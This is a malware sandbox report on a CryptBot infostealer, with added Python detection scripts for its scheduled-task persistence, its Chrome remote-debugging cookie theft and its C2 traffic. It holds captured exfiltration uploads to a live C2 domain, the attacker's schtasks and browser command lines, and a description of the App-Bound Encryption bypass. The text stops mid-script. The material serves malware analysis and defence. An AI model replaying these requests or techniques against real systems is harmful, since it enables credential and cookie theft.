Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562201
MD5: 2b0c7447e2568d3a7de91ecd14787204
SHA1: 658b8b86bd1f906cf2e30675f8fe7de8b350fb79
SHA256: 15132d20fdd894d09f23b8e7bdaf49736a0191a230a24141c63000d4b43ca72a
Tags: exe, user-Bitsight

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
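Two of the Sigma hits above describe the persistence and the cookie-theft shape of this sample: a scheduled task whose action lives under the user's Temp folder (the dropped service123.exe), and a browser started with a remote-debugging switch. The second matters because Chrome's Application-Bound Encryption keeps the cookie key usable only from inside the browser, so a common bypass is to launch the victim's browser with --remote-debugging-port or --remote-debugging-pipe and read the decrypted cookies back over DevTools, which is why the report pairs that Sigma hit with "Attempt to bypass Chrome Application-Bound Encryption". The following is an added example, not Joe Sandbox, Sigma or CryptBot code: it reimplements the gist of both rules in Python over constructed Sysmon-style process-creation events. The task name, the port, the profile-copy path and the parent/child pairings are illustrative; only the service123.exe path comes from the report.

```python
"""Gist of two Sigma process-creation rules, run over constructed events.

Added example for this report; not Joe Sandbox, Sigma or CryptBot code.
Event fields follow Sysmon Event ID 1 naming (Image, CommandLine,
ParentImage). All events below are made up except the dropped-file path.
"""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
# Chromium switches that expose the DevTools protocol to another process
REMOTE_DEBUG = re.compile(r"--remote-debugging-(port|pipe)\b", re.IGNORECASE)
# Temp locations the "Temp Folder" task-creation rule keys on in the task action
TEMP_DIRS = re.compile(r"(\\AppData\\Local\\Temp\\|%TEMP%|%TMP%|\\Windows\\Temp\\)", re.IGNORECASE)
SCHTASKS_CREATE = re.compile(r"(^|\s)/create\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(event: dict) -> list:
    """Return the rule names that match one process-creation event."""
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    parent = basename(event.get("ParentImage", ""))
    hits = []
    if image == "schtasks.exe" and SCHTASKS_CREATE.search(cmd) and TEMP_DIRS.search(cmd):
        hits.append("Suspicious Scheduled Task Creation Involving Temp Folder")
    if image in BROWSERS and REMOTE_DEBUG.search(cmd):
        hit = "Browser Started with Remote Debugging"
        # A non-browser parent driving the browser is the App-Bound Encryption
        # bypass shape: the stealer lets Chrome decrypt the cookies and pulls
        # them back over the DevTools protocol.
        if parent and parent not in BROWSERS:
            hit += " (parent: %s)" % parent
        hits.append(hit)
    return hits


def scan(events: list) -> list:
    """Return (image basename, hits) for every event that triggered a rule."""
    out = []
    for ev in events:
        hits = check_event(ev)
        if hits:
            out.append((basename(ev.get("Image", "")), hits))
    return out


# Constructed events. The schtasks target is the path the report lists for the
# dropped service123.exe; the task name, port and profile copy are illustrative.
EVENTS = [
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn "ExampleTask" /tr "C:\Users\user\AppData\Local\Temp\service123.exe" /sc minute /mo 1 /f',
     "ParentImage": r"C:\Users\user\Desktop\file.exe"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --remote-debugging-port=9222 --user-data-dir="C:\Users\user\AppData\Local\Temp\profile_copy"',
     "ParentImage": r"C:\Users\user\Desktop\file.exe"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer',
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn "Backup" /tr "C:\Program Files\Backup\backup.exe" /sc daily',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /query /tn "ExampleTask"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for image, hits in scan(EVENTS):
        print(image, "->", "; ".join(hits))
```

The remote-debugging check deliberately reports the parent process: a browser that an unsigned executable in Desktop or Temp starts with --remote-debugging-port is a much stronger signal than the switch alone, which developers and test frameworks also use.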

Classification

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies and credit cards, and of taking screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe ReversingLabs: Detection: 45%
Source: file.exe ReversingLabs: Detection: 39%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B315B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 7_2_00B315B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1E14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 7_2_6C1E14B0
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_c973b6c0-9
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\doomed\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cache2\entries\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 7_2_00B381E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C200860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C20A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C20A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C20A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C2BF960h 7_2_6C1FEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C204453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 7_2_6C2884A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C20C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C20A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C20A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 7_2_6C20A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C20E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C20E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 7_2_6C280730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C200740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 7_2_6C23A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 7_2_6C200260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C2BD014h] 7_2_6C2B4360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 7_2_6C257D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 7_2_6C253840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 7_2_6C20D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C239B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C21BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C21BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C25B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 7_2_6C20D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 7_2_6C259600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 7_2_6C20D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C2BDFF4h 7_2_6C253690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 7_2_6C20D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 7_2_6C283140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C1FB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 7_2_6C20D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 7_2_6C277350
Source: chrome.exe Memory has grown: Private usage: 0MB later: 26MB

Networking

Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49738 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49732 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.5:49764 -> 34.116.198.130:80
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1 | Host: home.fvtekk5pn.top | Accept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 | Host: fvtekk5pn.top | Accept: */* | Content-Length: 463 | Content-Type: multipart/form-data; boundary=------------------------pYYjhWy1oYCwrN4mefAuzt | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 59 59 6a 68 57 79 31 6f 59 43 77 72 4e 34 6d 65 66 41 75 7a 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 69 73 65 79 65 67 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a de f9 a8 ef 91 39 f2 7b 9b 80 d0 a5 26 c9 1f 59 21 42 11 23 d4 a1 af f9 41 e1 16 62 90 d0 3c fc 00 f6 0b 61 bd 83 f1 25 47 b7 a5 39 34 87 ad 6c 45 0e 98 9e cd de 2b 60 a0 96 1b ed a0 76 23 1c 6c e3 8d ba 03 c1 b0 64 53 65 66 15 40 91 b0 11 5c 25 1e d2 20 9e b3 33 eb 1f 31 0f 51 e1 1a 8d ae 84 c3 88 30 46 31 d0 ce 61 ea dc 88 40 f4 cd ba af 5e 4a 38 b2 bd ea db 96 6f 70 81 f3 d9 3e 7f 4c a0 2e b8 b9 dd 5c 68 92 5e 79 4a a4 df a8 ae a9 7a ea 22 f4 a7 a8 3b a8 6a ba ab 28 2a 03 81 c5 45 bb 4d b3 c8 a0 5f 3a 6d 55 4c 47 cd ec 7c ed 0a d6 e7 31 c0 52 15 8a fc 64 f8 12 8d d7 09 e7 c2 c9 45 10 be 28 74 2d 7a cc 27 eb 88 01 db 9b a9 08 b4 7f 53 14 3f 18 b6 3a 18 a4 b3 bb 76 3b fa f2 24 3d 0b 2b 02 21 7d 42 3b 8f eb 1d f5 80 d1 6b c9 ff 7a 17 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 59 59 6a 68 57 79 31 6f 59 43 77 72 4e 34 6d 65 66 41 75 7a 74 2d 2d 0d 0a | Data Ascii: --------------------------pYYjhWy1oYCwrN4mefAuztContent-Disposition: form-data; name="file"; filename="Viseyeg.bin"Content-Type: application/octet-stream9{&Y!B#Ab<a%G94lE+`v#ldSef@\% 31Q0F1a@^J8op>L.\h^yJz";j(*EM_:mULG|1RdE(t-z'S?:v;$=+!}B;kz--------------------------pYYjhWy1oYCwrN4mefAuzt--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 | Host: fvtekk5pn.top | Accept: */* | Content-Length: 76358 | Content-Type: multipart/form-data; boundary=------------------------szmG4cU03ja3hQXTJmg4Bs | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 73 7a 6d 47 34 63 55 30 33 6a 61 33 68 51 58 54 4a 6d 67 34 42 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 61 67 69 6a 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 7f a5 94 ea bb c7 9d 5d e6 f7 24 03 65 a7 b1 1d 29 52 5e 56 b0 ca 10 ed f9 a0 14 b6 17 16 a9 29 9c 16 8f 78 6a 65 9a fa 10 a0 18 6a fc ef b3 cb 8a ea 67 03 4e be dc d2 e1 5b 88 aa d0 91 47 fe 66 bf ba 5f e7 c5 da 62 d9 fb c8 a6 11 d1 6a 2b 0c 19 01 b8 bf fc 56 bb f9 dd 47 98 43 ea 64 11 90 51 ca 29 c1 65 70 0c d4 bb 5c 7b a4 f8 21 d2 e8 f6 cb 78 15 c4 23 71 8e 19 17 33 e4 29 27 7f 9f 6a 0a eb 9d b8 0c ec 3a 5a 14 13 8a df 09 6a 15 e1 3f b9 4c ce a3 ef bb 3d f9 31 8a 20 8f 6a 65 6d f5 fe c9 c2 34 29 65 b0 68 a0 a1 bd ad 2d 2b 04 2c 61 2d 82 b7 a6 95 a4 44 5d 40 e8 9d 17 64 f0 c3 a1 c6 6e d1 5f e7 e6 be d5 f9 d2 f0 71 3a 6a be de bd 6a 98 ce b2 92 0f 98 e9 fb a9 c5 59 b2 64 87 ef a4 15 a6 b5 49 c2 8a 8e 1a 25 fd 14 45 3a 35 ba fa 07 57 da 7e b6 c3 ec 8d 85 07 f1 44 28 e9 45 d0 2f d7 f0 d1 88 5b 55 a0 62 7d ac 77 21 3b f7 dd 18 f3 04 94 ae 64 1d 81 82 3b 83 8b 96 48 d0 fa 4d 0d c5 53 a5 13 4a 1b 9a e6 bf bd 22 83 12 b8 7b cc c3 e9 29 f2 d4 a2 7a c4 ba 02 5a 2a 59 60 bf 6a 0c e4 5b b2 28 2e 23 c7 89 f4 63 b5 08 a1 a7 e4 20 6c 0e 18 45 74 9d b8 04 9b f7 ca 33 6c 30 c6 52 7e 00 30 68 52 f1 3d 5d 17 88 d4 59 33 4a 97 e1 ec 44 91 5a 81 90 57 49 e0 84 f2 b2 eb b6 12 ca 28 fa d9 e3 0b 91 36 cd fc 74 3c ec 3e d1 15 1e 1c 13 6f dd e6 b2 36 d0 6b f1 0b 00 d0 cd ec 03 1a dd 13 56 5e 22 1c f7 8e 0d 78 e8 d5 e3 0d 16 11 70 30 13 bb cd b9 a4 39 1d 61 38 51 82 d8 01 6b 0f b7 30 23 83 86 59 35 19 cf ff 51 d9 f7 1f 86 03 dd 5d 13 8e 90 64 b1 fc c8 ac 80 a4 7e 8f 10 80 01 c2 f9 4e e0 3b a6 2b 45 37 d3 38 2b 09 74 af bc 51 16 45 a1 59 80 bd 3e c6 ac bc 52 54 37 29 97 1e f6 26 10 b0 23 67 a6 e5 e0 eb 1a d1 2a fc d9 4a 72 54 6e fa 11 cd e2 f9 bb cf 8b a0 f4 f1 a8 44 05 90 7a ad e9 74 95 ce e5 ea 72 3d 20 71 f4 75 d4 eb d5 33 e6 66 b0 a0 bd 62 af bc 53 28 eb ce f7 6d f0 cc 68 84 5b a7 de a2 74 15 ff 39 65 99 78 fb 64 aa e4 40 d9 31 21 92 00 e4 01 9b cd 47 b5 32 1d 8a c5 99 86 fe b7 a8 9a 59 24 50 bd bd 1a 1a 1b 1e c5 8a 3a f3 85 e4 cb cc ef 0f f6 f0 2a 10 43 c7 5e 90 2f fe f0 21 6a 17 48 33 cb a8 e6 65 99 74 41 b8 93 de 57 76 59 e8 81 fe 03 d8 79 59 41 b9 63 cf 14 d1 22 1a 77 0d 9e d2 b1 26 3f 19 27 33 e5 f4 f4 42 20 39 0a 44 47 55 de b3 c3 96 54 2f 25 fa 6e 94 4e 33 95 2f d7 4b f7 12 19 ea f9 16 e6 76 6c 66 da 93 41 7f 78 53 4f f2 b6 af 08 f8 28 bd a0 f6 72 dc 9e ad 88 aa cf a5 d3 58 64 ce ef c3 3a c2 f6 79 8e d5
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1 | Host: fvtekk5pn.top | Accept: */* | Content-Length: 30336 | Content-Type: multipart/form-data; boundary=------------------------LHHzmXo5pE7mAUW3vt0Vsu | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4c 48 48 7a 6d 58 6f 35 70 45 37 6d 41 55 57 33 76 74 30 56 73 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 65 66 75 6a 6f 77 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 87 80 2f 8a 96 f0 e8 2a c9 36 a1 90 5c cc 24 81 27 5b aa ae 98 b5 81 49 43 8a 01 61 78 48 77 1b 9a af 1e 47 96 de e6 8b a8 f7 4d 46 5d 2d 93 68 dc b8 81 c6 56 69 e7 f1 f6 89 87 e6 49 66 55 1e f4 0e 36 e7 d9 9c 8b 6a 26 90 05 c8 5c 76 f6 88 11 ee ac 9b 08 85 64 4c 65 22 94 ea 7e 17 90 36 c0 9d 30 e6 a4 4a 09 7a dc 47 c0 97 a1 e6 dc b6 5d c9 24 fc e9 a6 70 93 dd f2 21 6d 56 b4 c0 8a f8 c5 01 97 23 6b af b8 d1 98 e7 b9 b4 de 85 06 90 37 bc 47 06 ce ae 95 1d a0 e1 66 5f 8a 8f e2 9d 1a cb cf 53 d5 a9 dd db 6c 7c de d5 49 3c 81 fe eb 60 5b d2 2f d0 2a 70 57 f1 26 b6 63 15 e0 eb 11 65 40 05 7e db 03 73 16 18 b3 a7 07 c5 fe c0 5b 1c 35 08 14 12 de c0 68 86 14 e9 58 aa 9c 77 05 13 e4 a6 7a a4 0c 78 e2 41 4d 37 e6 3f 35 12 a3 53 58 63 4c 8a 1c 85 6b 6e 7d 54 c8 9a 58 9e 17 cd 9d d1 5e 22 9d 67 2f aa f0 6d 07 92 e1 d7 b2 42 1f 7b 94 f7 35 30 fa cf 96 5c a2 c9 10 96 44 1a 40 40 9e 83 f7 5e 31 40 ca b6 e1 0c 64 36 69 2a 64 8e 54 a7 32 57 83 bc 28 d8 66 66 47 2f fa 68 d3 ef 52 02 30 48 1e 03 f6 d4 7e 2f b9 14 8f 39 5d db 03 c2 0b 5b c9 77 07 72 dd aa ee 07 eb b2 6c a8 4b 88 72 51 23 69 32 5b d9 f7 b2 23 06 8e fd b3 2f 23 f4 17 2a 53 13 b2 bd 1e bd e9 06 79 a6 bd ce 3d b1 b5 c7 a1 4c 98 58 bf 61 ef e6 5d ac aa 5f cd 7d 9c 8a 54 d6 51 c4 68 c9 2e 8a 8e a5 30 59 b9 e2 74 5f 19 fe 20 06 c2 01 2c 36 69 3f 4c fa f1 ec 25 b8 fa 3a ea cd 18 d9 ce b4 f6 86 f7 64 80 69 cb 5f 3d 3d a1 0c dc 2e c6 c0 33 78 2b ee f9 70 72 ad 01 98 e5 a8 b0 8f 9c 17 56 2e d3 b4 94 8d 31 bd 24 9f 48 06 6f 25 8d 8d 66 0c 2a e8 83 5f 20 d4 be 56 4a 4d 8d 81 1a 6b 57 d1 b4 fd b4 a8 2d 23 3c 7f 75 6d 9c 83 93 f4 fb 63 90 22 a0 cf 28 66 f1 36 8c 3f d3 f2 46 76 94 cc 81 9e c7 a8 ee 5c ad 7f b4 3a 42 a7 df a0 5e d1 6f 37 8f 2d a0 41 f7 ce a4 63 91 8f e5 9e d4 c6 df b6 e9 34 45 87 06 05 11 4b 67 2d 83 0f cb 14 63 e6 e4 93 19 29 89 8d 49 51 1c 86 e3 b5 29 fc 7f 40 f3 2e 78 5a d0 c0 9e 43 59 6c 65 92 84 b9 ae a3 d6 8b 2e db 0f 50 05 b5 ee f5 f8 d3 46 f4 51 73 ca 3f 24 5e 74 37 a3 b0 a3 84 2a 26 ec d8 ba 4a 86 3f 6f 10 ad f6 d1 69 40 b8 60 81 ab 62 dd 80 de 38 26 d0 64 dc a8 8f 89 fc 4b 0b a8 ae a1 9f bf ec c3 01 77 b3 82 94 25 e9 86 38 7c 72 77 66 6f 9d 12 96 6b 48 81 a3 d4 56 32 d4 be d1 b1 84 b7 c5 2c 4d 55 91 4a 0e 80 2d 55 00 91 1f 6e fb ea 2d 04 2d 7d 45 79 9c 89 90 ac 09 10 e6 84 69 84 34 88 36 a0 fe f3 c6 ea 72 a4 88 88 74 e3 3f b3
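The captured traffic has three structural traits worth keying on when no IDS with the ET rule above (SID 2054350) sits in the path, for example when only proxy or PCAP-derived request logs are available: neither the GET nor the POSTs carry a User-Agent header (the "HTTP GET or POST without a user agent" signature), the check-in is a GET to an opaque path of 20 alphanumerics followed by 10 digits, and each exfiltration is a POST to /v1/upload.php consisting of a single multipart part named "file" with a random .bin filename and an application/octet-stream body. The following is an added example, not Joe Sandbox, Suricata or CryptBot code: a small Python parser that pulls those traits out of raw requests. The sample requests are constructed to mirror the captured headers (hostnames, paths and boundary as in the report); the payload bytes are filler, not the captured ciphertext, and the reading of the trailing digits as a unix timestamp is an assumption. The domain, path and boundary are per-sample and will change; the structural checks are the part meant to survive that.

```python
"""Flag CryptBot-style HTTP requests in raw request captures.

Added example for this report, not Joe Sandbox, Suricata or CryptBot code.
The requests below are constructed to mirror the captured headers above
(hostnames and paths as in the report); the multipart payload is filler.
"""
import re

UPLOAD_PATH = "/v1/upload.php"
# Shape of the captured beacon path /LCXOUUtXgrKhKDLYSbzW1732019347:
# 20 alphanumerics then 10 digits (reads like a unix timestamp; assumption).
BEACON_PATH = re.compile(r"^/[A-Za-z0-9]{20}[0-9]{10}$")


def parse_request(raw: bytes):
    """Split one HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def multipart_parts(body: bytes, content_type: str):
    """Return [(content-disposition, content-type, payload)] for a multipart body."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return []
    delim = b"--" + m.group(1).encode("latin-1")   # body delimiter is "--" + boundary
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):                 # closing delimiter
            break
        phead, _, payload = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if payload.endswith(b"\r\n"):               # CRLF that precedes the next delimiter
            payload = payload[:-2]
        disp = ctype = ""
        for line in phead.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            if name.lower() == "content-disposition":
                disp = value.strip()
            elif name.lower() == "content-type":
                ctype = value.strip()
        parts.append((disp, ctype, payload))
    return parts


def cryptbot_indicators(raw: bytes) -> list:
    """Return the CryptBot-like traits seen in one request (empty if none)."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if "user-agent" not in headers:                 # "HTTP GET or POST without a user agent"
        hits.append("no User-Agent header")
    if method == "GET" and BEACON_PATH.match(path):
        hits.append("beacon path: 20 alphanumerics + 10 digits")
    if method == "POST" and path == UPLOAD_PATH:
        hits.append("POST to /v1/upload.php")
        parts = multipart_parts(body, headers.get("content-type", ""))
        if len(parts) == 1:
            disp, ctype, _ = parts[0]
            fname = re.search(r'filename="([^"]+)"', disp)
            if fname and fname.group(1).endswith(".bin") and ctype == "application/octet-stream":
                hits.append("single octet-stream part named " + fname.group(1))
    return hits


def build_upload(host: str, boundary: str, filename: str, payload: bytes) -> bytes:
    """Assemble a POST in the exact layout of the captured uploads (no User-Agent)."""
    b = boundary.encode("latin-1")
    body = (b"--" + b + b"\r\n"
            b'Content-Disposition: form-data; name="file"; filename="' + filename.encode() + b'"\r\n'
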